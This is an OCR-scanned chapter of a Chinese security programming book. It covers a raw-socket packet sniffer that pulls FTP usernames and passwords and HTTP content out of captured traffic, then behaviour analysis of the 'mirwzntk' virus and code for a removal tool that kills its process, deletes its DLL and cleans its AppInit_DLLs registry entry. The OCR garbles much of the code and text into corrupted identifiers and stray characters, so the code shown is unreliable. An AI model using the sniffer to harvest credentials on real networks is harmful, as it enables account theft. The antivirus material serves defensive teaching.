2. 嗅 探 器 的 实现 代码 
有 了 上 面 的 内 容 ， 剩 下 的 部 分 就 是 和 前 面 一样 简 单 了 。 代 码 如 下 : 


veLudl DeecoderTCppacket (enar +*oData,l ehar 本 瑟 CT char saDesttp) 
{ 
TCPHeader *pTCPHdr = (TCPHeader *)pData; 


PeiNEE (CI ESV rd NE Nr 
已 和， 
ntohs(prTePHdr->sourcePort), 
SDDS 
ntohs (pTECPHAr=>destinationPorty});s 


// 下 面 还 可 以 根据 目的 端口 号 进一步 解析 应 用 屋 协 议 
switoh'(intons (pTCPHAr >destinationport)) 
{ 








case 21: 
// 解析 FTP 的 用 户 名 和 密码 
(MD 
puyata, = BData't sioeotf (TocPHeader); 
TFstrmnem (pnata, "USRR oa 0 ) 


{ 
printf(nEtp UserName : Ss Nr\nN, BData ss 4) 
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} 


i£ ( strnemp/(pData, "PASS ", 5S) == 0 ) 
{ 
printf ("Ftp Password : $s \r\n", pData + 4)? 


printf ("FTP========================================\rT\N");} 
break; 
case 80: 
case 8080: 
// 直接 输出 浏览 器 获取 到 的 内 容 
printf ("WEB========================================\r\n"); 
printf("%s\r\n", pData + sizeof (TCPHeader)):; 
printf ("WEB========================================\I\Nn")} 
break; 


void DecodeUDPPacket (char *pData, char *szSrcIP, char *szDest1ip) 


} 


UDPHeader *pUDPHdr = {UDPHeader *)pData; 


DeintT (Yeumd -> "Saad\ Nn 
szSrecIP, 
nteohs (PpUDPHdAdr->sourcePort), 
szDestI1ip, 
ntohs (BUDPHdr->destinationPport)); 


void DaecodeIPPacket (char *pData) 


{ 


int 


IPHeader *pIPHdr = (IPHeader*)pData; 


in addr source, dest” 
char szSourceIp[32], szDest1ip[32]; 


ETE NENDSIR 


// 从 IE 头 中 取出 源 IP 地 址 和 目的 IP 地 址 
source.Ss tn.S addr = pIPHdr->ipSource; 
dest.Ss un.Ss addr = pIPHdr->ipDestinationy 
stropy(szSourcelIp, inet ntoal(source)); 
strcpy (szDestIp, inet ntoal(dest)); 


/1 IP 头 长 度 
int nHeaderLen = (pIPHdr->iphVerLen & 0xf) * sizeoE(gEONG) 7 


switch( pIPHdr->ipProtocol ) 
4 
case IPPROTO TCP: // TCP 协议 
DecodeTCPPacket (pData + nHeaderLen, SzSOurceIp, szDestIp)’; 
break; 
case IPPROTO_ UDP: 
DecodeUDPPacket (pData + nHeaderLen, szSourceIlp, szDestIp); 
break; 
Case IPPROTO ICMP: 
break; 


main() 
WSADATA Wsa; 
WSAStartup (MAKEWORD (2, 2), &wSsa); 


// 创建 原始 套 节 字 
SOCKET sRaw = socket (AF INET, SOCK RAW, IPPROTO IP); 
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// 获取 本 地 TB 地 址 


第 | char szHostName[56]; 

8 | SOCKADDR IN addr in; 

2 | Struct hostesntl Ost 

宇 | gethostname (szHostName, 56): 

理 | if( (pHost = gethostbyname!l( (char*)szHostName)) == NULL ) 
AR | { 

客 | h 二 下 

编 | } 

程 | 

Se | // 在 调用 ioct1 之 前 ， 必 须 绑 定 套 节 字 

例 | addr in.sin family = AF INET; 

剖 | addr Linsin Bort = htons (0); 

析 | memcpy (taddr in.sin addr.Ss.un.s.addr, pHost->h_addr Jist[0], pHost->h length)? 


printfA pinaing to Lnterfacels Te IN\Nr Na net ntoaladd ln Slade) Ys 
if( bind(sRaw, (PSOCKADDR)&addr in, sizeof (addr in)) == SOCKET ERROR ) 
RR { 

| EetHERN 一生 池 


} 





// 设置 SIO_RCVALL 控制 代码， 以 便 接收 所 有 的 IP 包 

| DWORD dwValue = 1; 

if( ioctlsocket (sRaw, SIO RCVALL, &dwValue) != 0 ) 
{ 





Eetnarny ml 


} 


// 开始 接收 封包 
char DurFELLQ2A] 
int nRety 

while (TRUE) 


1 

| { 

| nRet = recv (sRaw, buff, 1024, 0)» 
| Lem Re ON 

| { 

| DecodeIPPacket (buff£); 

| } 

| } 


closesocket (SRaw) : 
WSACleanup (); 


return 0; 
} 


| 咱 探 器 的 运行 结果 如 图 8-44 和 图 8-45 所 示 。 


> 65.55.58.195:88 
ptp ls ~ 


to Paploe”s lcid=@xB804 HTTPAL :1 


CoM INT NAU ON 


-128:1161 


| 

| 

| 

| 

上 RE 2 = = -fe 11 - :rompat le; MSIE 6.035 Windows NT 于 
| 

| 

| 

| 7 -证 . 工 
| 9 
| 





图 8-44 解析 FTP 登录 账户 和 密 古 图 8-45 “Web 数据 的 直接 输出 
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8.3 ”及 病毒 编程 技术 


正 所 谓 有 收 亦 有 正 ， 两 者 相辅相成 ， 这 就 类 似 阴阳 、 五 行 之 类 的 相生 相克 ， 永 远 都 是 较 
为 平衡 的 。 当 病毒 技术 超越 反 病 毒 技术 时 ， 反 病毒 技术 一 定 会 再 次 超越 病毒 技术 ， 它 们 就 是 
在 互相 对 抗 中 前 进 ， 寻 找 相 对 平衡 的 。 

前 面 剖析 了 关于 恶意 程序 的 例子 ， 接 下 来 讲述 一 些 关于 反 恶 意 程序 的 例子 。 这 样 的 互补 
学 习 才 有 助 于 知识 的 完整 和 整体 水 平 的 提高 。 


8.3.1 病毒 专 杀 工具 的 开发 


现在 免费 的 杀毒 软件 越 来 越 多 了 ， 例 如 360 安全 卫士 、 金 山 毒霸 、 瑞 星 …… 为 什么 还 会 
存在 专 杀 工 具 呢 ? 笔者 猜测 有 3 个 原因 ， 第 1 个 原因 是 虽然 有 很 多 免费 杀毒 软件 ， 但 还 是 有 
很 多 人 不 安装 杀毒 软件 ， 如 果 爆 发 了 传播 速度 较 快 、 感 染 规模 较 大 的 病毒 或 蠕虫 的 话 ， 杀 毒 
厂商 会 为 了 快速 阻止 这 种 比较 “暴力 ”的 病毒 或 蠕虫 的 传播 与 感染 ， 而 推出 轻 量 级 的 供 网 友 
使 用 的 工具 ; 第 2 个 原因 是 杀毒 三 商 的 杀毒 软件 对 于 某 种 病毒 无 能 为 力 ， 为 了 能 尽快 挽回 自 
己 的 杀毒 软件 无 能 的 颜面 ， 而 推出 的 一 种 方案 ， 第 3 个 原因 是 感染 病毒 的 人 为 了 解决 自己 的 
问题 而 编写 的 。 

专 杀 工 具 是 针对 某 一 个 或 某 一 类 的 病毒 、 木 马 或 蠕虫 等 恶意 软件 而 开发 的 工具 。 专 业 的 
杀毒 软件 需要 专业 的 反 病 毒 公司 来 进行 开发 ， 而 专 杀 工 具 可 能 是 由 反 病 毒 公司 开发 的 ， 也 可 
能 是 由 个 人 进行 开发 的 。 下 面 就 来 介绍 个 人 是 如 何 开发 专 杀 工 具 的 。 

1. 病毒 的 分 析 方法 

病毒 的 分 析 方 法 一 般 有 两 种 ， 分 别 是 行为 分 析 和 逆向 分 析 。 个 人 编写 专 杀 工 具 ， 一 般 针 
对 的 都 是 非 感染 型 的 病毒 ， 当 然 也 有 针对 感染 型 的 病毒 的 ， 但 是 后 者 相对 比较 少 一 些 。 对 于 
非 感染 型 的 病毒 ， 通 常情 况 下 并 不 需要 对 病毒 做 逆向 分 析 ， 只 需要 对 病毒 进行 行为 分 析 就 可 
以 编写 专 杀 工具 。 而 如 果 病 毒 是 感染 型 的 ， 为 了 能 够 修复 被 病毒 感染 的 文件 ， 那 么 就 不 能 只 
是 简单 地 对 病毒 进行 行为 分 析 ， 必 须 对 病毒 进行 逆向 分 析 ， 从 而 进一步 修复 被 病毒 感染 或 破 
坏 的 文件 。 下 面 分 别 介绍 什么 是 行为 分 析 ， 什 么 是 逆向 分 析 。 

病毒 、 木 马 等 恶意 程序 都 有 一 些 比 较 隐 项 的 “小 动作 ”而 这 些 动作 一 般 情 况 下 是 正常 程 
序 所 没有 的 。 比 如 ， 把 自己 添加 进 启动 项 , 或 把 自己 的 某 个 DLL 文件 注入 其 他 进程 中 , 或 把 
自己 复制 到 系统 目录 下 …… 这 些 行为 一 般 都 不 是 应 用 软件 该 有 的 正常 行为 。 用 户 拿 到 一 个 病 
毒 样本 以 后 ， 通 常 是 将 病毒 复制 到 虚拟 机 中 ， 然 后 打开 一 系列 监控 工具 ， 比 如 注册 表 监 控 、 
文件 监控 、 进 程 监控 、 网 络 监控 等 ,将 各 种 准备 工作 做 好 以 后 ,在 虚拟 机 中 把 病毒 运行 起 来 ， 
看 病毒 对 注册 表 进 行 了 哪些 操作 ， 对 文件 进行 了 哪些 操作 ,连接 了 哪个 IP 地 址 、 创建 了 多 少 
进程 。 通 过 观察 这 一 系列 操作 ， 就 可 以 写 一 个 程序 ， 只 要 把 它 创 建 的 进程 结束 ， 把 它 写 入 注 
册 表 的 内 容 删 除 ， 把 它 新 建 的 文件 删除 ， 就 等 于 把 这 个 病毒 杀 掉 了 。 当 然 ， 整 个 过 程 并 不 会 
像 说 起 来 这 么 容易 。 通 过 一 系列 系统 监控 工具 找 出 病毒 的 行为 就 是 行为 分 析 方法 。 

当 病毒 感染 可 执行 文件 以 后 ， 感 染 的 是 什么 内 容 是 无 法 通过 行为 监控 工具 发 现 的 。 而 病 
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毒 对 可 执行 文件 的 感染 ， 有 可 能 是 添加 一 个 新 节 来 存放 病毒 代码 ， 也 可 能 是 通过 节 与 节 之 间 
的 缝隙 来 存放 病毒 代码 的 。 无 论 是 哪 种 方式 ， 都 需要 通过 逆向 的 手段 进行 分 析 。 通 过 道 向 分 
析 的 方法 分 析 病 毒 ， 就 称 为 逆向 分 析 法 ， 也 有 人 称 其 为 高 级 分 析 ， 因 为 掌握 逆向 分 析 的 能 
力 要 比 掌握 行为 分 析 有 难度 。 逆 向 分 析 的 工具 在 前 面 已 经 介绍 过 了 ， 通 常 的 逆向 工具 有 OD、 
IDA、WinDBG 等 。 

2. 病毒 查 杀 方法 简介 

病毒 的 查 杀 方 法 有 很 多 种 。 在 网 络 安全 日 益 普及 、 杀 毒 软 件 公 司 大 力 宣 传 的 今天 ， 想 必 
大 部 分 关心 网 络 安全 的 人 对 于 病毒 查 杀 的 技术 有 了 一 些 了 解 。 当 今 常 见 的 主流 病毒 查 杀 技术 
有 特征 码 查 杀 、 启 发 式 查 杀 、 虚 拟 机 查 杀 和 主动 防御 等 。 下 面 简单 地 介绍 特征 码 查 杀 、 启 发 
式 查 杀 和 虚拟 机 查 杀 。 

特征 码 查 杀 是 杀毒 软件 厂商 查 杀 病毒 的 较为 原始 、 准 确 率 较 高 的 一 种 方法 。 该 方法 是 通 
过 从 病毒 体内 提取 病毒 特征 码 ， 从 而 能 够 有 效 识别 出 病毒 。 这 种 方法 只 能 查 杀 已 知 病毒 ， 对 
未 知 病毒 则 无 能 为 力 。 

启发 式 查 杀 是 静态 地 通过 一 系列 “ 带 权 规 则 组 合 ” 对 文件 进行 判定 ， 如 果 值 高 于 某 个 界 
限 ， 则 被 认定 为 病毒 ， 否 则 不 为 病毒 。 启 发 式 查 杀 可 以 相对 有 效 地 识别 出 病毒 ， 但 是 往往 也 
会 出 现 误 报 的 情况 。 

虚拟 机 查 杀 技术 主要 是 对 付 加 密 变 形 病 毒 而 设计 的 。 病 毒 被 加 密 变 形 后 存在 多 种 形态 ， 
其 变形 的 密 钥 不 同 ， 被 称 为 多 态 型 病毒 。 这 样 就 无 法 提取 特定 的 特征 码 进 行 查 杀 。 但 是 加 密 
之 后 的 代码 必须 还 原 后 才能 进行 运行 , 而 解密 代码 是 不 变 的 。 因 此 杀毒 软件 模拟 出 CPU 的 指 
令 系 统 ， 模 拟 执行 并 还 原 加 密 后 的 病毒 ， 当 病毒 还 原 后 进行 查 杀 。 

启发 式 查 杀 和 虚拟 机 查 杀 都 是 较为 流行 的 查 杀 技术 。 

3. 简单 病毒 行为 分 析 

这 里 编写 一 个 简单 的 病毒 专 杀 工具 ， 这 个 工具 非常 简单 ， 用 到 的 都 是 前 面 的 知识 。 先 准 
备 一 个 简单 的 病毒 样 例 ， 然 后 在 虚拟 机 中 进行 一 次 行为 分 析 ， 最 后 写 出 一 个 简单 的 病毒 专 杀 
工具 。 虽 然 前 面 的 例子 都 有 代码 让 读者 练习 ， 但 是 这 次 要 对 病毒 进行 行为 分 析 ， 然 后 编写 代 
码 ， 完 成 专 杀 工具 。 

在 虚拟 机 中 进行 病毒 分 析 ， 因 此 安装 虚拟 机 是 一 个 必需 的 步骤 。 虚 拟 机 也 是 一 个 软件 ， 
它 用 来 模拟 计算 机 的 硬件 ， 在 虚拟 机 中 可 以 安装 操作 系统 ， 安 装 好 操作 系统 后 可 以 安装 各 种 
各 样 的 应 用 软件 ， 与 操作 真实 的 计算 机 是 没有 任何 区 别 的 。 在 虚拟 机 中 的 操作 完全 不 影响 真 
实 的 系统 。 除 了 对 病毒 进行 分 析 需 要 安装 虚拟 机 以 外 ， 在 进行 双 机 调试 系统 内 核 时 安装 虚拟 
机 也 是 不 错 的 选择 。 在 虚拟 机 中 安装 其 他 种 类 的 操作 系统 也 非常 方便 。 总 之 ， 使 用 虚拟 机 的 
好 处 非常 多 。 这 里 推荐 使 用 VMware 虚拟 机 ， 请 读者 自行 选择 进行 安装 。 

安装 好 虚拟 机 以 后 ， 在 虚拟 机 上 放置 几 个 行为 分 析 的 工具 ， 包 括 FileMon、RegMon 和 
Procexp3 个 工具 。 分 别 对 几 个 工具 进行 设置 ， 对 RegMon 和 FileMon 进行 字体 设置 ， 并 设置 
过 滤 选 项 ， 如 图 8-46 和 图 8-47 所 示 。 

对 于 FileMon 和 RegMon 的 字体 设置 , 在 菜单 “选项 ”一 “字体 ”命令 下 , 通常 笔者 选择 “ 宋 
体 ””“9 号 ”。 读 者 可 以 根据 自己 的 喜好 进行 设置 。 在 设置 过 滤 条 件 时 ， 在 “包含 ”处 输入 的 是 
需要 监控 的 文件 ， 这 里 的 “a2.exe” 是 病毒 的 名 字 。 也 就 是 说 ， 只 监控 与 该 病毒 名 相关 的 操作 。 
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图 8-47 对 FileMon 设置 过 波 


下 面 对 Procexp 进行 设置 ， 需 要 在 进程 创建 或 关闭 时 持续 5 秒 高 亮 显示 进程 ， 以 进行 观 
察 。 设 置 方法 为 单 击 菜单 “Options” 一 “Difference Highlight Duration” 命 令 ， 在 弹出 的 对 话 
框 中 设置 “Different Highlight Duration” 为 “5” 如 图 8-48 所 示 。 

将 上 面 几 个 工具 都 设置 完 后 ， 运 行 病毒 ， 观 察 几 个 工具 的 反应 ， 如 图 8-49、 图 8-50 和 
图 8-51 所 示 。 





尽 SxDIOrEr. ere 
VMwareTrar. exe 
VMwareUser. ee 


Difference Highlighting Dur... 网 EE Filemon, exe 


MY Drocesn, ee 
onine ezs 








图 8-48 ”对 Procexp 的 设置 图 8-49 在 Procexp 中 看 到 mirwzntk.exe 病毒 进程 


在 图 8-49 中 看 到 的 病毒 进程 名 为 “mirwzntk.exe”， 而 不 是 “a2.exe”。 这 个 进程 是 
病毒 “a2.exe” 创 建 的 ， 在 病毒 做 完 其 相关 工作 后 ,将 自己 删除 。 图 8-50 和 图 8-51 所 示 
分 别 是 病毒 对 注册 表 和 文件 进行 的 操作 ， 这 里 就 不 一 一 进行 说 明了 。 下 面 对 行为 分 析 做 
个 总 结 


Ho 
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上 了 PEIStr7 onitor Sysinternals: wwy. sysinternals. CGI 
文件 加 编辑 古 】 选项 四 ) 帮助 00) 
园区 | 文 辑 区 今 | 要 里 | 由 过 


请 求 跑 径 
.SetValue HEIM\SOFTWARE\Microsoft\Windows NI\Curre.,. SUCCESS “mirsznt. dll 





图 8-50 ”RegMon 对 注册 表 监 控 的 信息 











开 和 语 科 > 

WY explorar, xe’1536 SET INFORMATION C:\Documents and SettingsVkAdninistrator\ 更 面 \a2_ exe 

PE) sa2 exe:176 WRITE C: MYINDOWSVsysteamn32Vnirwznt, dll 

EP] 2 sxe:176 SET TNFORMATION C; WINDOWS\system32\config\software. LDG 

EY 2. exe:1T6 SET INFORMATION C: \WINDOWS\systen32Nconfig\software. LDG 

门 2, exe:178 SET INFORNATION C; MWINDOWS\system32\confiesoftyare. LDG 

巴 ] 2, xa,176 SET IHNFORMATION C:\WINDOWS\system32\mirwentk, exe 

巴 ] 2 exe:176 WRITE LC: \WINDOWS\system32\mirwzntk exe 

EY] 2. exe:176 SET INFORMATION C:\WINDOWS\syst end2\mirurntk. exe 
Reemon exe:1924 SET INFORMATION C:\Documents and Sattings\Admirnistrator\ 点 面 \a2. exe 
Resanon exe: 1924 SET INFORMATION Ci\Docunents and Settings\Administrator\ 磊 面 \a2, exe 
Reemon, exe: 1924 SET INFORMATION Ci\Domments and Sattings\Administrator\ 虑 面 \a2, exe 
Regnon exe:1924 SET INFORMATION CiADocunents and Settings\Administrator\ 虚 面 \a2. exe 

ER procexp, exe:T84 SET IHFORMATION C:\Documents and Settings\Administrator\ 虑 而 \a2 exe 

ww eT SET TNFOENATIQN PN and S VA \ 总 面 \a2 axe 

A Dn exe -784 Ci ADocumants and Settings\Administrator\ 泉 人 

i procexp, exe'T84 CNDocuments and Settings\Adninistrator\ 课 面 \a2 exe 


32. exe' 176 C:\Documents and Settings\Administrator\ 庶 面 \a2. exe bat 


md exe'320 BINDocumants and Settings\Administrator\ 课 面 \a2, exe 
| cmd. exe;320 Di\Docunents and Settings\kdninistrator\ 夏 面 \a2. exe, bat 


图 8-51 FileMon 对 文件 监控 的 信息 


病毒 在 注册 中 写 入 了 一 个 值 ， 内 容 为 “mirwznt.dll”， 写 入 的 位 置 如 下 : HKLM\SOFTWA 
RE\IMICROSOFT\WINDOWSNT\CURRENTVERSION\WINDOWS\APPINIT DLLS 。 病 毒 在 
Ci\WINDOWS\system32\ 下 创建 了 两 个 文件 ， 分 别 是 “mirwznt.dll” 和 “mirwzntk.exe”， 创 建 
病毒 进程 mirwzntk.exe， 并 生成 了 一 个 .bat 的 批 
处 理 程序 用 于 删除 自身 , 也 就 是 删除 “a2.exe”。 

下 面 来 写 一 个 专 杀 工 具 ， 对 该 病毒 进行 查 
杀 ， 如 图 8-52 所 示 。 

4. 对 mirwzntk 病毒 专 杀 工具 的 编写 

在 查 杀 病毒 的 技术 中 有 一 种 方法 类 似 特 征 图 8-52 ”mirwzntk 病毒 的 专 杀 工具 
码 查 杀 法 ， 这 种 方法 并 不 从 病毒 体内 提取 特征 码 ， 而 是 计算 病毒 的 散 列 值 。 也 就 是 对 病毒 本 
身 的 内 容 进行 散 列 计算 ， 然 后 在 查 杀 的 过 程 中 计算 每 个 文件 的 散 列 ， 再 进行 比较 。 这 种 方法 
简单 且 易 实现 ， 常 见 的 有 MD5、CRC32 等 一 些 计算 散 列 的 算法 。 

下 面 选 用 CRC32 算法 计算 函数 的 散 列 值 ， 这 里 给 出 一 个 现成 的 CRC32 函数 ， 只 需 直接 
调用 就 可 以 了 ， 代 码 如 下 : 


DWORD CRC32 (BYTE* ptr,;DWORD Size) 
{ 


Fe KiliRirvzntk 





DWORD crcTablel[256] 7creTmpl; 


// 动 态 生 成 CRC32 表 
for (int i=0; i<256;-++) 
{ 


CreTmp1 = 4 
Form (nt =B 0 es 
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if (crecTmpl&1) crcTmpl = (crcTmpl >> 1) ^ 0xEDB88320L7 
else crcTmpl >>= 1 
} 


crecTable[i] = crcTmpl:; 


} 

/7 计算 cRc32 值 

DWORD crcTmp2= OXFFFFEFEFEFF; 
while(Size——) 


{ 


CrcTmp2 = ((crecTmp2>>8) & OxQOO0FFFFFF) ^ crcTablel[l (crcTmp2^ (*ptr)) & OxFF ]57 


从 七 工 二 7 


return (creTmp2^OxFFFFEFEF); 


} 
该 函数 的 参数 有 两 个 ， 一 个 是 指向 缓冲 区 的 指针 ， 另 一 个 是 缓冲 区 的 长 度 。 将 文件 全 部 
读 入 缓冲 区 内 ， 然 后 用 CRC32 函数 就 可 以 计算 文件 的 CRC32 散 列 值 。 接 着 来 看 查 杀 的 源 代 


/7 查找 指定 进程 
BOOL FindTargetProcess (char *pszProcessName, DWORD *dwPpid) 


{ 


} 


BOOL brFind = FALSE; 


HANDLE hpProcessSnap = CreateToolhelp32Snapshot (TH32CS_ SNAPPROCESS, 0); 
if (hpProcessSnap == INVALID HANDLE VALUE) 
{ 
return brFind; 
} 


PROCESSENTRY32 pe = { 0 }; 
pe.dwSize = Sizeof (pe); 


BOOL bRet = Process32First (hProcessSnap, &pe); 
while (bRet) 
{ 
if (lstrcemp (pe.szExeFile,pszProcessName) == 0) 
{ 
*dwPid = pe.th32ProcessID; 
brFind = TRUE; 
break; 
} 
bRet = Process32Next {(hProcessSnap, &pe); 
} 


CloseHandle (hProcessSnap)’; 


return brind; 


// 提升 权限 
BOOL EnableDebugPrivilege (char *pszPrivilege) 


{ 


HANDLE hToken = INVALID HANDLE VALUE; 
LUID duld; 
TOKEN_PRIVILEGES tp; 


BOOL bRet = OpenProcessToken (GetCurrentProcess(),TOKEN ADJUST PRIVILEGES 
QUERY, ghToken); 
if£ (bRet == FALSE) 
{ 
return bRet; 


} 


| TOKEN_ 


贡 oo 避 
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bRet = LookupPrivilegeValue (NULL,pszPrivilege, &luid); 
if (bRet == FALSE) 
第 { 
8 return bRet; 
自 } 
章 
tp.PriviljegeCount = 1; 
黑 tp.Privileges[0] .Luid = luid; 
区 tpPp.Privileges[0] .Attributes = SE PRIVILEGE ENABLED; 
程 bRet = AdjustTokenPrivileges (hToken, FALSE, ttp,sizeof (tp) NULL, NULL); 
例 return bRet; 
训 
析 #define EXE VIRUS NAME "mirwzntk.exe" 
#define DLL VIRUS NAME "mirwznt.dll" 
ne voiqd CKillMirwzntkDlg::OnKill () 
{ 
// 在 这 里 添加 处 理 程序 
BOOL bRet = FALSE; 
DWORD dwPid = 0; 
COPELNng oTxb 
bRet = FindTargetProcess ("mirwzntk.exe", &tdwPid); 





if (bRet == TRUE) 


{ 
csTxt = _T(" 检 查 系统 内 存 ...\r\n"); 
csTxt += _T ("系统 中 存在 病毒 进程 :mirwzntk.exe\r\n"); 
csTxt += ._T(" 准 备 进行 查 杀 ..,\r\n"); 
SetDlgItemText (IDC LIST,csTxt); 
bRet = EnableDebugPrivilege (SE DEBUG NAME); 
if (bRet == FALSE) 


\ 
csTxt += _T(" 提 升 权 限 失 败 \r\n"); 


csTxt += _T(" 提 升 权限 成 功 \r\n"); 
} 
SetDlgItemText (IDC LIST,;CcsTxt); 
HANDLE hpProcess = OpenProcess (PROCESS ALL ACCESS, FALSE, dwPid); 
if (hProcess == INVALID HANDLE VALUE) 


{ 
csTxt += _T ("无 法 结束 进程 \r\n")， 
return ; 
} 
DRet = TerminateProcess (hpProcess,0); 
if (bRet == FALSE) 
{ 
| csTxt += _T(" 无 法 结束 进程 \r\n”); 


return 7? 


csTxt += _T(" 结 束 病毒 进程 \r\n"); 
SetDlgItemText (IDC, LIST,;cCsTxt):} 
CloseHandle (hProcess); 


else 


csTxt += TT(" 系 统 中 不 存在 mirwzntk.exe 病毒 进程 \r\Nn"); 


Sleep(10); 


char szSysPath[MAX PATH] = { 0 }; 
GetSystemDirectory(szSysPath,MAX PATH); 
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siemp (loy): 
第 GetSystemDirectory(szSysPath, MAX PATH); 
8 
章 Lstroat (soyspath/"\\") 
lstrcat (szSysPath,DLL VIRUS_NAME) ; 
if (Getpileattributes(szSysPath) == 0xFREPEERPE) 
{ 
编 csTxt += _T("mirwznt.d1l 病毒 文件 不 存在 \r\n")， 
程 } 
实 else 
| { y Wo 
csTxt += _T("mirwznt.,d1l 病毒 文件 存在 正在 进行 计算 校 验 和 \r\n"); 
析 HANDLE hrFile = CreateFile (szSysPath,GENERIC READ, FILE SHARE READ,NULL, OPEN_ 
EXISTING, FILE ATTRIBUTE NORMAL, NULL); 
JE (hEFile == INVALID HANDLE VALUE) 
{ 
Ca MessageBox ("Create Error"); 


retorrn 
} 5 
DWORD dwSize = GetFileSize'(hFile,NULLD),; 
if (GQwSize == OXFFFFFEFF) 
中 
MessageBox ("GetFileSize Error™)y 
return y 
} 
BYTE *pFile = (BYTE*)malloc (dwSize)y 
WE OR Ly 
1 
MessageBox ("malloc Error"); 
Yeturn 


} 


DWORD gdwNum = 0; 
ReadFile (hFile,pFile,dwSize,&dwNum, NULL); 


DWORD dwCrc32 = CRC32 (pFile,dwSize); 


i (DELLS |= NULE) 
{ 
free(pFile); 
brile = NULLY> 
} 


CloseHandle (hFile); 


if (awitre32 tm Ox2D0F20EE) 

csTxt += _T(" 校 验 和 验证 失败 Nr Nn”); 
je 
else 


csTxt += .T(" 校 验 和 验证 成 功 ， 正 在 删除 .. .Nr\n"); 
bRet = Deletepile(szSysPath) ， 
1" (mRSt) 
{ 
csTxt += _T ("mirwznt .dll 病毒 被 删除 \r\n"); 
} 
else 
{ 
csTxt += _T("mirwznt.d1l 病毒 无 法 被 删除 \r\n"); 
js 


3 


sleep (10) ; 
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csTXxt += _T 了 ("正在 检查 注册 表 ...\r\n") > 
SetplgItemText (IDC LIST, csTxt); 


HKEY hKey; 

char cData[lMAXBYTE] = { 0 }; 

LONG lSize = MAXBYTE; 

long lRet = RegOpenKey (HKEY LOCAL MACHINE, 
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 
&hKey); 


if(lRet == ERROR SUCCESS) 
{ 
lRet = RegQueryValueEx (hKey, "AppInit DLEs",NULL, NULL, (unsigned char *)cData, 
(unsigned long *)&lSize); 
if ( lRet == ERROR_ SUCCESS) 
{ 
if (lstremp(cData, "mirwznt.dil") == 0) 


{ 
csTxt += (" 注 册 表 项 中 存在 病毒 信息 \zNn”") ， 
} 


lRet = RegDeleteValue (hKey, "AppInit_DLLs"); 
if (lRet == ERROR SUCCESS) 


{ 

csTzxt += _T(" 注 册 表 项 中 的 病毒 信息 已 删除 \r\n") ; 
} 
else 


{ 
GsTxt += _T ("注册 表 项 中 的 病毒 信息 无 法 删除 \r\n")， 
} 
} 
else 


{ 
csTxt += _T(" 注 册 表 存 项 中 不 存在 病毒 信息 Nr\n");， 
} 


RegCloseKey (PKey) : 
} 


else 
} 

csTxt += _T(" 注 册 表 信息 读 取 失败 \r\n") ; 
} 


csTxt += _T(" 病 毒 检测 完成 ， 请 使 用 专业 杀毒 软件 进 行 全 面 扫描 YN) 
SetDlgItemText (IDC LIST, csTxt); 
) 


5. 感染 型 病毒 的 分 析 方 法 

查 杀 感 染 型 的 病毒 是 不 能 单单 通过 行为 分 析 来 完成 的 。 查 杀 感 染 型 的 病毒 最 重要 的 是 修 
复 被 感染 后 的 文件 ， 如 果 程 序 被 感染 了 ， 而 杀毒 软件 直接 把 文件 删除 了 ， 这 样 做 是 不 行 的 。 
对 于 专 杀 工具 而 言 ， 就 更 不 行 了 。 本 小 节 主 要 介绍 被 感染 后 的 可 执行 文件 如 何 进行 修复 。 

拿 到 一 个 感染 型 的 病毒 ， 要 如 何 进行 分 析 呢 ?大 概 可 以 分 为 如 下 几 步 。 

首先 是 查看 二 进 制 文件 的 入 口 所 在 的 节 。 通 常情 况 下 ， 文 件 的 入 口 都 会 在 PE 程序 的 第 
一 个 节 ， 比 如 在 “.text” 节 或 者 是 “CODE” 节 中 ， 早 期 的 启发 式 查 杀 中 就 会 判定 文件 的 入 口 
te ee citi abit ni 
的 程序 较 少 ， 而 现在 这 样 做 显 通 了 加 

ee 上 情况 下 ， 程序 启动 都 不 会 先 执 行程 序 员 编写 的 代码 ， 而 

会 先 执行 编译 器 产生 的 代码 。 前 面 已 经 介绍 过 , 在 VC6 的 程序 被 执行 后 ， 首 先 执行 的 是 启 
动画 数 。 被 首先 执 和 了 的 编译 器 的 启动 代码 往往 是 固定 的 《每 个 相同 版 本 的 编译 器 的 启动 代码 
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基本 是 相同 、 有 规律 可 循 的 )。 熟 悉 常见 程序 启动 代码 的 情况 下 ， 可 以 通过 识别 入 口 处 代码 来 
判断 文件 是 否 感 染病 毒 。 感 染 型 的 代码 一 般 都 会 在 原始 程序 代码 执行 之 前 先 执行 。 

再 次 是 在 虚拟 机 中 调试 病毒 ， 找 到 原始 程序 的 入 口 处 ， 并 将 原始 程序 从 内 存 中 转 存 到 破 
盘 上 。 在 调试 的 过 程 中 分 析 病 毒 代 码 执行 的 动作 很 重要 ， 尤 其 是 病毒 进行 加 密 之 后 ， 观 察 其 
解密 还 原 非 常 重要 。 

最 后 是 修复 被 感染 的 程序 ， 包 括 可 执行 程序 的 入 口 、 可 执行 程序 的 导入 表 ， 并 删除 病毒 
在 文件 中 的 代码 。 当 程序 从 内 存 中 转 存 到 磁盘 上 之 后 ， 可 能 是 无 法 运行 的 ， 那 么 就 需要 通过 
二 进 制 比较 ， 比 较 病 毒 与 可 执行 程序 存在 的 差异 ， 逐 步 进 行 修复 ， 直 到 转 存 后 的 程序 可 以 被 
执行 为 止 。 最 后 一 步 是 一 个 反复 的 工程 ， 因 为 修复 后 的 文件 很 可 能 无 法 使 用 ， 因 此 必须 反复 
调试 、 比 较 文 件 才 能 完成 。 

以 上 就 是 感染 型 病毒 的 基本 分 析 方法 ， 在 下 面 的 实例 中 会 介绍 这 些 方法 。 

6. 感染 型 病毒 的 分 析 与 专 杀 实现 

这 里 有 一 个 感染 型 病毒 的 两 个 样本 ， 也 就 是 一 个 病毒 感染 后 的 两 个 被 感染 的 文件 。 它 还 
会 不 断 感染 系统 中 其 他 文件 ， 释 放 一 些 DLL 之 类 的 模块 。 但 是 , 这 里 只 关心 如 何 去 修 复 它 被 
感染 的 部 分 。 先 来 看 专 杀 工具 完成 后 的 效果 ， 如 图 8-53 所 示 。 

首先 用 PEID 查看 可 执行 文件 的 入 口 点 ,发 现 可 执行 文件 的 入 口 点 在 “.text” 节 中 , 但 是 
并 没有 识别 出 文件 是 被 何 种 程序 开发 的 ， 如 图 8-54 所 示 。 再 通过 观察 节 判 断 程 序 的 开发 工具 ， 
如 图 8-55 所 示 。 从 图 8-55 中 发 现 一 个 未 知 的 节 ， 即 最 后 一 节 “.rrdata”。 这 个 节 名 并 非 编译 
器 生成 的 节 名 。 用 PEID 再 次 查看 另外 一 个 样本 的 节 信 息 ， 如 图 8-56 所 示 。 这 里 也 有 一 个 未 
